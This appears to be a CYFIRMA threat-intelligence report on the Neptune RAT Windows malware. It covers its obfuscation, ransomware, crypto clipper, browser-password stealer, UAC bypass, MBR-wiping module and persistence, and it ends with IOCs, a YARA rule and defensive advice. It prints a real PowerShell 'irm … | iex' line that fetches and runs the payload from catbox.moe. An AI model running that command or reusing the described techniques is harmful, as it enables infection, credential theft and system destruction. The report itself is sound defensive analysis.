Self Assessment

NEPTUNE RAT : An advanced Windows RAT with System Destruction Capabilities and Password Exfiltration from 270+ Applications

Published On : 2025-04-07
Share :
NEPTUNE RAT : An advanced Windows RAT with System Destruction Capabilities and Password Exfiltration from 270+ Applications

EXECUTIVE SUMMARY

At CYFIRMA, we are committed to providing up-to-date insights into current threats and the tactics used by malicious actors targeting both organizations and individuals. In this report, we will take an in-depth look at the latest version of Neptune RAT, which has been shared on GitHub using a technique involving PowerShell commands:

irm (Invoke-RestMethod): A PowerShell command used to download content from a URL.

iex (Invoke-Expression): A PowerShell command that executes the downloaded content as a script.

These commands allow the malware to download and execute a batch script and malware payload (which is encoded in Base64 and hosted as a text file on catbox.moe). This is dropped into the AppData folder which, when executed, establishes a connection between the client and the attacker’s server (Neptune RAT).

Neptune RAT incorporates advanced anti-analysis techniques and persistence methods to maintain its presence on the victim’s system for extended periods and comes packed with dangerous features, including a crypto clipper, password stealer with capabilities to exfiltrate over 270+ different applications’ credentials, ransomware capabilities, and live desktop monitoring, making it an extremely serious threat.

INTRODUCTION

A recent version of Neptune RAT has recently been discovered by researchers at CYFIRMA. Written in Visual Basic .NET, this malware has been spreading rapidly across platforms such as GitHub, Telegram, and YouTube, often marketed with phrases like “Most Advanced RAT.” This indicates its widespread use by cybercriminals targeting Windows users.

The creator of Neptune RAT has made the software available without the source code, intentionally obfuscating the executable files to make analysis more challenging. Although the developer claims it is a free version, they hint at a more advanced version behind a paywall, and despite the developer’s assertion that the software is intended for educational and ethical purposes, its usage and distribution raise serious security concerns.

In this report, we will provide a detailed analysis of the Neptune RAT, including both static and dynamic analysis techniques. Additionally, we will offer guidance on how to protect your system from this malware.

KEY FINDINGS

  • The latest version of Neptune RAT has been shared on GitHub by its developer.
  • Neptune RAT v2 now generates direct PowerShell commands, such as irm <file_url> | iex, directly from the builder.
  • It uses the catbox.moe API to host malicious scripts and files.
  • The RAT is obfuscated, and Arabic characters are used to replace the original strings, making it harder to analyze.
  • It employs anti-analysis techniques, including virtual machine (VM) detection.
  • The malware utilizes multiple persistence methods, such as modifying the Windows Registry and adding tasks to the Task Scheduler.
  • Neptune RAT is equipped with dangerous features, including ransomware capabilities, a crypto clipper, System destruction, a password grabber, live desktop monitoring, and the ability to disable antivirus software, etc.

STATIC ANALYSIS

File name NeptuneRat.exe
File size 24.4 MB (25,648,128 bytes)
Language Visual Basic .NET
MD5 Hash a28c717c899abe4f93dadfa40a1ec157
SHA256 Hash 8df1065d03a97cc214e2d78cf9264a73e00012b972f4b35a85c090855d71c3a5

OBFUSCATION TECHNIQUE:

We have identified that the section of the executable file containing code, specifically in the [.txt] data format, exhibits a high entropy level greater than 7. This high entropy indicates that the file is highly obfuscated or packed.

During our analysis of the executable file, we discovered the presence of a custom heap named “User String Heap(7).” Custom heaps are often introduced in malware to store sensitive strings, such as secret decryption keys and other critical data. The heap contains a value named “ObfuscatedByFreemasonry,” which could indicate that the malware obfuscation is performed by the Freemasonry group. Additionally other values like “OvFKngQwmcKYBBHvzmNnKstopbUZjdoh”, “cktXJyQELUjPDcYl” and “؋؊ٺـح؈؈؉ـىــ؈ٽـ” are also stored in that heap which are potentially used for string encryption/decryption codes at runtime. The inclusion of Arabic text (؋؊ٺـح؈؈؉ـىــ؈ٽـ) may serve to add random-looking characters, making it more challenging to identify the original code.

The entry point of NeptuneRat.exe was examined and found to be completely obfuscated and renamed using Arabic characters and emojis, creating further confusion. This method is responsible for initializing the program and jumping to the first Windows Form, as this RAT operates in a GUI (Graphical User Interface) version.

OBFUSCATION IDENTIFICATION:

The executable file was identified as being obfuscated, by open-source tools, which we used in order to analyze the malware’s underlying code.

Analyzing Malicious TCP Communication and Unique Device Identification

When analyzing the “strings Heap” in NeptuneRat.exe, we found several suspicious namespaces and queries related to sockets, suggesting that the malware is using network communication in a malicious way.

MMS (Maximum Segment Size) is used for transferring large amounts of data over the TCP/IP protocol, like sending or receiving files, images, or even streaming content.

Incoming_Request and Outgoing_Request appear to be variables designed to manage connections between the infected system and the attacker over the TCP protocol. TCP is commonly used by cybercriminals in RATs and Command and Control (C2) communication, as it allows them to send and receive data reliably and efficiently.

ManagementClass and wmiClass are being used by the RAT to gather system information, such as hardware IDs, which could be used to create a unique identifier for each infected machine.

Based on these observations, Neptune RAT communicates with the infected system using the TCP protocol. It uses a multi-handler approach, which generates a unique ID for each compromised device.

After deobfuscation, we identified that in Class2, method_0 is used to initialize the server socket by accepting a port parameter, which sets up the server to listen for client connections over the TCP protocol on that specific port.

The SendBufferSize and ReceiveBufferSize are both set to 51,200 bytes (approximately 50KB) which ensures that data can be sent and received reliably between the server and clients, minimizing the risk of data loss during transmission.

The command socket 0.Listen(500) specifies that the Neptune RAT server will allow only 500 client connections at a time. Once this limit is reached, any new client connection attempts will be refused, ensuring the software remains stable and doesn’t overload.

System Information Retrieval Method

The ‘get’ method collects a variety of details about the computer, such as the user’s name, computer name, operating system details, the current process, and executable running, and hardware details like CPU, GPU, RAM, hard drive serial number, network information such as the MAC address, and even details about connected USB devices. It also checks for system status and security settings such as antivirus software and firewall status, the default browser, system language, installed drivers, battery status, and the last time the system was rebooted.

DLL ANALYSIS

Upon further static analysis, we discovered several malicious DLLs (Dynamic Link Libraries) placed in the Plugins folder, such as Randomeware.dll, Clipper.dll, UAC.dll, Destry.dll, BlockAntivirus.dll, Chromium.dll, etc. Each DLL is designed for a specific function, which allows the attacker to perform multiple tasks independently. For example, Randomeware.dll is loaded into the system when a ransomware command is executed. It then encrypts files and demands a ransom for the decryption key. This modular approach enables the attacker to conduct several malicious activities on the infected system simultaneously, improving the overall efficiency of the malware. In the following analysis, we have examined some of these DLL files in detail.

Ransomeware.dll

The Ransomware.dll calls the ENC method, passing several parameters such as the encryption password, a background wallpaper, the attacker’s Bitcoin address, the ransom amount in Bitcoin, and the attacker’s email address. They then demand payment in exchange for the decryption key to unlock the encrypted files, and after the files are encrypted, the attacker displays their ransom demand through an HTML file (How to Decrypt My Files.html), which is created on the victim’s desktop. This file provides instructions on how the victim can contact the attacker and pay the ransom to decrypt the files.

This code defines a method CreateKey, which generates a 32-byte key based on a password input (strPassword). It uses a combination password conversion (into a byte array, hashing the byte array with SHA-512) then trimming the result to a 32-byte key. The generated key is further used to encrypt the system files by appending an .ENC extension.

UAC BYPASS:

The ‘bypassadmin’ method edits the registry in the current user’s section by creating a key named _rptls. Inside _rptls, it creates a subkey called ‘install’ and stores the file path, which is passed as a parameter. After that, it checks if the RegAsm.exe file exists in the path Environment.GetEnvironmentVariable(“windir”) + \Microsoft.NET\Framework\v4.0.30319\RegAsm.exe. If the file is found, the method calls injRun from the CsAPI class, passing parameters p, an empty string, and decompressing a resource named ‘ping’. This technique is used to modify system settings and manipulate the system to bypass administrator privileges.

Upon further investigation of Resources.ping, we found that the ping file in the resources is a 32-bit executable compressed format. After decompression, we obtained the executable, which was then repacked using the UPX packer (with an entropy level of around 7). We achieved this using the same UPX tool, which provides both packing and unpacking capabilities, by running the command upx.exe -d ping.exe. The executable is written in C++.

After unpacking, we found the string “Hey I’m Admin” and identified that it imports functions like RtlFillMemory and NtAllocateVirtualMemory. The executable also references explorer.exe, ntdll.dll, and a GUID related to administrator elevation. This indicates it performs process injection to gain admin access and then prints the specified string.

Chromum.dll (password stealer from various browsers)

Chromium.dll is a stealer DLL used to steal passwords from various browsers, including Chrome, Opera, Yandex, 360Chrome, Comodo Dragon, Coolnovo, Torch, Chromium, and Brave. It extracts the browser data from the default LocalApplication folder, where credentials are stored in an encrypted format. After extracting the data, the malware decrypts the credentials and sends them to the attacker’s server.

Crypto clipper (Clipboard access):

This malware uses a regex to identify if the victim has copied cryptocurrency wallet addresses – or crypto types – on the clipboard. Once detected, the malware replaces the original address with the hacker’s wallet address of the same type, which when pasted will insert the hacker’s wallet address, sending the victim’s funds to the attacker’s wallet instead of the intended recipient.

Email and Password Exfiltration from Email Applications, Vaults and Browsers

After decompiling Email.dll, we discovered that the threat actor utilized an external advanced software called “Email Password Recovery Pro” to extract emails and their passwords from various browsers and email applications. This software is specifically designed for password recovery, but in this case, it is being exploited for malicious purposes to steal sensitive credentials.

First step: Extract the exe file from the embedded resource of the dll file

The malware extracts the executable from the Resources.files and saves it in an “EmailPasswordRecovery” folder within the Temp directory, typically located at C:\Users\Admin\AppData\Local\Temp\EmailPasswordRecovery.

Second step: Executing the cmd command

After extraction, the malware uses command-line methods to execute EmailPasswordRecoveryPro.exe, specifying Output.json as the destination where the extracted credentials are saved in JSON format.

Third step: deleting traces.

After completing the email and password extraction process, the malware deletes the extracted external software and other associated dependencies, ensuring minimal traces are left behind to evade detection and analysis.

After decompressing the resources, found that a cybersecurity forensic tool that can extract passwords, threat actors are repurposing it to extract emails and passwords without user consent. The presence of command-line utilities facilitates silent execution and seamless integration with RATs for covert operations.

MBR (Master Boot Record) overwrite to sabotage Windows OS.

The Epilepsy method enters an infinite loop where it repeatedly changes the desktop screen’s colour by selecting random RGB values and applying them using PatBlt, creating a flashing effect. Simultaneously, it starts two threads: MasonMBR, which corrupts the Master Boot Record (MBR) by writing random data to the first 512 bytes of the physical drive (\\.\PhysicalDrive0), and MasonRegistryDeleter, which deletes the HKCR registry hive using a hidden command prompt. The threads run concurrently and are joined to ensure continuous execution, causing persistent system disruption and corrupt at the end.

BUILDER:

A customized GUI builder allows the threat actor to configure several features, such as ShellCommand, RootKit (for hiding processes), StartupRegistry, StartupScheduler, AntiVirtualMachine, SpreadUSB, and the ability to set a custom icon with a custom assembly, making the malware appear legitimate.

After building the malware, a message states that the command powershell “irm files.catbox.moe/px5r4x.bat | iex” has been copied to the clipboard. This command can be executed on a target system to download and run the malware without directly sending an executable file. It leverages PowerShell’s Invoke-RestMethod (irm) to fetch a script hosted on the file-sharing service catbox.moe. The output is then piped to Invoke-Expression (iex), which executes the downloaded script directly in the system.

After visiting the URL, it automatically downloaded a batch script file (px5r4x.bat), which contains a script in base64 encoded format.

After decoding the base64 string, we obtained a PowerShell script that silently executes on the victim’s system without displaying any popups or requiring user consent. The script uses the catbox.moe API to store base64 encoded strings, which it then reads and converts back to files (malicious scripts) before dropping them in the user AppData folder. Finally, it calls Start-Process to execute the dropped files. By using these techniques, it bypasses detection at the scan time level.

After visiting the URL “https://files.catbox.moe/3588w9.txt”, the malicious file is stored in a Base64-encoded format.

After decoding the Base64 string into a file, we observed that the first two ASCII characters were “MZ,” which is the signature for Windows executable files. This indicated that the file is not a batch script as initially expected, but rather an executable. However, the final execution of the file failed.

The reason for this failure is that the developer mistakenly configured the file to execute as a .bat file instead of a .exe. This error caused the execution failure. It is possible that this was done intentionally to create a limitation in the free version, encouraging users to purchase the paid version for the full functionality.

Upon loading the final executable in a decompiler, we observed several custom commands that execute based on requests received from the server. For example:

Case “LN”: (Remotely download and execute other files)

This command downloads a file from the URL specified in array[2] and saves it with a temporary filename. It then immediately opens the downloaded file using Process.Start(), which executes the file.

File Manipulation in User AppData by Neptune RAT

The code retrieves the path to the user’s AppData directory and creates a new file path by appending the new file. It then attempts to copy the file from its original location to the newly created path in the user AppData directory. This technique is commonly used to hide files in a less visible location on the user’s system.

PERSISTENT TECHNIQUES

Task Scheduler:

The malware creates a persistent scheduled task in Windows using schtasks.exe. It sets the task to run every minute (/sc minute /mo 1) and executes a command by passing the file path parameter. The task runs silently (WindowStyle.Hidden) and forces creation (/f). This technique is designed for both stealth and persistence.

Registry Modification:

This malware enhances its persistence by modifying the Windows Registry, specifically targeting the Run key located at HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. By adding a new entry here, the malware ensures that it is automatically executed every time the user logs into the system.

ANTI-VM

It queries the Win32_ComputerSystem class to retrieve system information, specifically the manufacturer and model. If the manufacturer is “Microsoft Corporation” and the model contains “Virtual,” or if it detects “VMware” or “VirtualBox,” it returns true, indicating a virtual machine. If the malware detects it is running in a virtual machine, it will terminate itself and prevent from starting, making it harder for antivirus software to detect.

DYNAMIC ANALYSIS:

File manipulation

Upon execution, the malware copies itself to the Roaming folder within the user AppData directory (C:\Users\WDAGUtilityAccount\AppData\Roaming).

Registry Modification (Persistent method)

Furthermore, the malware registers itself in the Run key of the Windows Registry to ensure persistence. Upon boot, it will silently and automatically execute without any user interaction.

Task Scheduler (Anti-Kill and Highly Persistent Technique):

Additionally, the malware employs another persistence technique by adding itself to the Task Scheduler. This ensures that it automatically starts every day at 00:01:00, allowing the attacker to maintain a continuous connection and monitor the victim’s system for an extended period.

Ransomware:

Upon executing the ransomware command from the main panel, a dialogue window opens, allowing the attacker to configure custom contact details such as an email address, set the ransom amount, and input the Bitcoin address before sending the command.

Ransom demand:

After execution, the malware creates an HTML file on the desktop named ‘How to Decrypt My Files.html.’ This file provides instructions on how to contact the attacker, explains what has happened to the files, and specifies the ransom amount required to recover them. Additionally, all files on the system are encrypted, and their extensions are changed to .ENC, rendering them inaccessible without decryption.

EXTERNAL THREAT LANDSCAPE MANAGEMENT

The developer has recently released the latest version of Neptune RAT, which incorporates advanced techniques and multi-feature capabilities. They have indicated that this is a free trial version, suggesting that a paid version may offer even more advanced features.

Upon investigation of the website mentioned in the ‘About’ section of their GitHub page, the threat actor was given the option to download a free trial version of Neptune Rat. It is also noted that this program is developed by the Freemasonry group, ABOLHB, and Rino.

After reviewing the contact page on their Instagram, YouTube, Discord, and the developer’s personal website, it is noted that the developer identifies himself as a malware developer. He states that he was born in Moscow and currently resides in Al-Kharj, Saudi Arabia.

On Discord, the individual claimed affiliation with the Mason Team and demonstrated malware development activity. Their YouTube channel showcases multiple malware samples they have created, indicating active involvement in malicious software development.

CONCLUSION

The analysis of the latest version of Neptune RAT reveals a sophisticated and highly dangerous piece of malware designed for persistent, covert operations on Windows systems. Its ability to generate direct PowerShell commands (using irm and iex) enables seamless delivery and execution, effectively bypassing traditional security measures. It also has the capability to destroy Windows OS and features advanced password-grabbing functionalities.

The use of platforms like GitHub and APIs such as catbox.moe for hosting malicious payloads highlights its widespread distribution strategy. Advanced obfuscation techniques and custom heaps with high entropy, make reverse engineering and detection challenging. The integration of Arabic characters further complicates the analysis, suggesting an intentional effort to evade security tools and researchers.

Neptune RAT’s arsenal of malicious capabilities – ranging from ransomware and crypto clippers to live desktop monitoring and antivirus disabling – makes it a severe threat. Its anti-analysis methods, such as virtual machine detection and persistence techniques through registry modifications and Task Scheduler, ensure it can maintain long-term control over compromised systems.

Given its complexity and evolving nature, Neptune RAT poses a significant risk to both individuals and organizations. Continuous monitoring, robust endpoint protection, and proactive threat detection strategies are crucial to mitigating the impact of this malware.

INDICATORS OF COMPROMISE

S. N Indicators type context
1. 8DF1065D03A97CC214E2D78CF9264A73E00012B972F4B35A85C090855D71C3A5 EXE NeptuneRAT.exe
2 9fe8a026b5f41a4d434bb808273b83a364a1994a60e2ab7e232a31bf2b76a33f EXE MasonClient.exe
3 e03f6f8d0ce9abdda3e3fff801babcd4448a567f330c4cac498fec39652f3c77 EXE Ping.exe
4. 21c832f9d76b8ae74320b8fac811a761f09f871ee32c9ab1c8fb1492b95a7d04 BAT px5r4x.bat
5. E8C8F74AE15E7D809D9013BDFA2A10DD54E00D4EA5FF4ED6CD4A163B80D2D318 DLL AntiFormat.dll
6. 14E196E089014313C9FA8C86CE8CFFB1C7ADACD7D1DF7373D97B30D31B965DF9 DLL BlockerAntiVirus.dll
7. ADD3E9A1C6654D1EC9B7FD0FFEA6BDCD0EB7B3E4AFA70C6776835CC238E8F179 DLL bomber.dll
8. DA27B3619E958D58F0A8867D765421328632B834B3A18955508609A3028A96DF DLL Bookmarks.dll
9. DEC534AB858A71575A3836B96D0F96DF89EB8BA50F9BC69350FAA0F7BCCCFD25 DLL BSOD.dll
10. 88CC579613730F847F72E28B4E880BD8104EDF6D6AB37FFA0D18F273889D1A40 DLL Chromium.dll
11. E310A1B264912AE886CD956ABC42DEE846455A99F67C3EA8336A202240BD7DFA DLL Clipper.dll
12. 2B4AA36247DA1AF1DE0091E7444FBF8F829D133743BB3B931618C66BBD10D10B DLL Cmstp-Bypass.dll
13. 9A35113E1D9412701D85B5AF01B4AD2B1E584C6E0963E439053808B29B4DA90A DLL WebCam.dll
14. 684D2D50DD42E7BA4E9BD595E9B6F77EB850185556C71DB4EDA6F78478A5E6FB DLL DeletePoints.dll
15. 9CA70DA0EA94B3BEA68C9A3259EC60192C5BE1AE7630A08924053168BBF41335 DLL Destry.dll
16. D0C6F5D916933A1F8D852CA42163FF50BFE07132FCACAC03DB7D20F573284208 DLL DisableWD.dll
17. 1BBD4262C8821A0290FE40A8E374C6E5FA2084331670EDE42E995D3D5902EFCD DLL WDExclusion.dll
18. A19EF7ACE3118FF9E5BE24B388AFF3E56A5BAC0D4069BF8480721E3F4508706A DLL UACBypass.dll
19. 20C31AC326B5C6076F9B1497F98B14A0ACD36FF562DFA2076589A47A41D0E078 DLL Info.dll
20. 6D02EB3349046034CF05E25E28EF173C01D9E0EA1F4D96530DEFE9E2A3D5E8A0 DLL KillCPU.dll
21. 62FDC4B159AD1B4225098276E6F2DCF29D49D9545AC9575D4FF1F6B4F00CDB65 DLL Microphone.dll
22. 70554DB8312C03C8CCE38925DB900CDBE8E57E88DA29B0BF2F61ED1BBCAA03BD DLL Ransomware.dll
23. CD2B320433843D4D694AE8185C7EF07A90D7DCE6D05A38AC4481AD2EAB9BCFE5 DLL ScreenRotation.dll
24. 630B1879C2E09B2F49DD703A951FB3786EDE36B79C5F00B813E6CB99462BF07C DLL Encoder.dll

MITRE ATTACK FRAMEWORK

S.N TACTIC TECHNIQUE
1 Initial Access (TA0001) (T1566) Phishing: Spear phishing Link
2 Execution (TA0002) (T1059.001) Command and Scripting Interpreter: PowerShell
3 Persistence (TA0004) (T1547.001) Registry Run Keys / Startup Folder
4 Privilege Escalation (TA0004) (T1548.002) Bypass User Account Control
5 Défense Evasion (TA0005) (T1027) Obfuscated Files or Information
(TA027.002) Software Packing
(TA027.009) Embedded Payloads
6. Credential Access (TA0006) (T1555.003) Credentials from Web Browsers
(T1606.001) Web Cookies
(T1056) Input capture
(T1056.001) Keylogging
7. Discovery (TA0007) (T1087) Account Discovery
(T1217) Browser Information Discovery
(T1083) File and Directory Discovery
T1082) System Information Discovery
8. Collection (TA0009) (T1123) Audio Capture
(T1185) Browser Session Hijacking
(T1115) Clipboard Data
(T1005) Data from Local System
(T1113) Screen Capture
T1125 Video Capture
9. Command and Control (TA0011) (T1572) Protocol Tunnelling
10. Exfiltration (TA0010) (T1041) Exfiltration Over C2 Channel
11. Impact (TA0040) (T1485) Data Destruction

YARA Rules

rule NeptuneRAT_Detection
{
meta:
description = “Detects Neptune RAT associated with FreeMasonry developer group and files hashed SHA256”
author = “Cyfirma Research”
date = “2025-03-31”
threat_actor = “Neptune RAT (FreeMasonry Group)”
mal_type = “Remote Access Trojan”

strings:
// Hash-based detection for EXE files
$hash1 = “8DF1065D03A97CC214E2D78CF9264A73E00012B972F4B35A85C090855D71C3A5”
$hash2 = “9fe8a026b5f41a4d434bb808273b83a364a1994a60e2ab7e232a31bf2b76a33f”
$hash3 = “e03f6f8d0ce9abdda3e3fff801babcd4448a567f330c4cac498fec39652f3c77”

// Hash-based detection for BAT file
$hash4 = “21c832f9d76b8ae74320b8fac811a761f09f871ee32c9ab1c8fb1492b95a7d04”

// Hash-based detection for DLL files
$hash5 = “E8C8F74AE15E7D809D9013BDFA2A10DD54E00D4EA5FF4ED6CD4A163B80D2D318”
$hash6 = “14E196E089014313C9FA8C86CE8CFFB1C7ADACD7D1DF7373D97B30D31B965DF9”
$hash7 = “ADD3E9A1C6654D1EC9B7FD0FFEA6BDCD0EB7B3E4AFA70C6776835CC238E8F179”
$hash8 = “DA27B3619E958D58F0A8867D765421328632B834B3A18955508609A3028A96DF”
$hash9 = “DEC534AB858A71575A3836B96D0F96DF89EB8BA50F9BC69350FAA0F7BCCCFD25”
$hash10 = “88CC579613730F847F72E28B4E880BD8104EDF6D6AB37FFA0D18F273889D1A40”
$hash11 = “E310A1B264912AE886CD956ABC42DEE846455A99F67C3EA8336A202240BD7DFA”
$hash12 = “2B4AA36247DA1AF1DE0091E7444FBF8F829D133743BB3B931618C66BBD10D10B”
$hash13 = “9A35113E1D9412701D85B5AF01B4AD2B1E584C6E0963E439053808B29B4DA90A”
$hash14 = “684D2D50DD42E7BA4E9BD595E9B6F77EB850185556C71DB4EDA6F78478A5E6FB”
$hash15 = “9CA70DA0EA94B3BEA68C9A3259EC60192C5BE1AE7630A08924053168BBF41335”
$hash16 = “D0C6F5D916933A1F8D852CA42163FF50BFE07132FCACAC03DB7D20F573284208”
$hash17 = “1BBD4262C8821A0290FE40A8E374C6E5FA2084331670EDE42E995D3D5902EFCD”
$hash18 = “A19EF7ACE3118FF9E5BE24B388AFF3E56A5BAC0D4069BF8480721E3F4508706A”
$hash19 = “20C31AC326B5C6076F9B1497F98B14A0ACD36FF562DFA2076589A47A41D0E078”
$hash20 = “6D02EB3349046034CF05E25E28EF173C01D9E0EA1F4D96530DEFE9E2A3D5E8A0”
$hash21 = “62FDC4B159AD1B4225098276E6F2DCF29D49D9545AC9575D4FF1F6B4F00CDB65”
$hash22 = “70554DB8312C03C8CCE38925DB900CDBE8E57E88DA29B0BF2F61ED1BBCAA03BD”
$hash23 = “CD2B320433843D4D694AE8185C7EF07A90D7DCE6D05A38AC4481AD2EAB9BCFE5”
$hash24 = “630B1879C2E09B2F49DD703A951FB3786EDE36B79C5F00B813E6CB99462BF07C”

// Developer group detection using specific keywords
$dev_group = “FreeMasonry” wide ascii

// RAT name detection
$rat_name = “NeptuneRat” wide ascii

condition:
($hash1 or $hash2 or $hash3 or $hash4 or $hash5 or $hash6 or $hash7 or $hash8 or $hash9 or $hash10 or
$hash11 or $hash12 or $hash13 or $hash14 or $hash15 or $hash16 or $hash17 or $hash18 or $hash19 or $hash20 or
$hash21 or $hash22 or $hash23 or $hash24) or ($dev_group or $rat_name)
}

Recommendations

  • Implement threat intelligence to detect indicators of compromise (IOCs) associated with Neptune RAT, including known malicious IPs, domains, and file hashes. Use advanced endpoint protection platforms (EPP) with real-time monitoring to identify unusual behaviours. Deploy host-based intrusion prevention systems (HIPS) to block suspicious activities at the endpoint level.
  • Restrict PowerShell script execution through application control policies, disabling the use of irm and iex commands unless explicitly required. Configure firewalls to block outbound connections to suspicious domains like catbox.moe and known C2 servers. Use DNS filtering to prevent access to malicious domains.
  • Apply strict access controls and least privilege principles to limit administrative access. Enable multi-factor authentication (MFA) to reduce the risk of credential theft. Implement endpoint detection and response (EDR) solutions for initiative-taking threat detection and forensic analysis.
  • Conduct regular vulnerability scans and penetration testing to identify weaknesses in the network. Apply security patches and updates promptly to minimize exposure to known vulnerabilities.
  • Monitor for suspicious file modifications, especially changes to file extensions like `. ENC`, along with unusual network connections and unexpected process executions. Utilize Security Information and Event Management (SIEM) tools to detect, analyse, and correlate these suspicious activities for timely threat identification.
  • Establish a comprehensive incident response plan to manage infections effectively, including isolation, analysis, and remediation procedures. Provide ongoing cybersecurity training to employees to recognize phishing and social engineering tactics.
  • Ensure strong email security filters to detect and block malicious attachments or links. Regularly back up critical data and verify recovery procedures to mitigate the impact of ransomware attacks. Continuously review and update security policies to address emerging threats.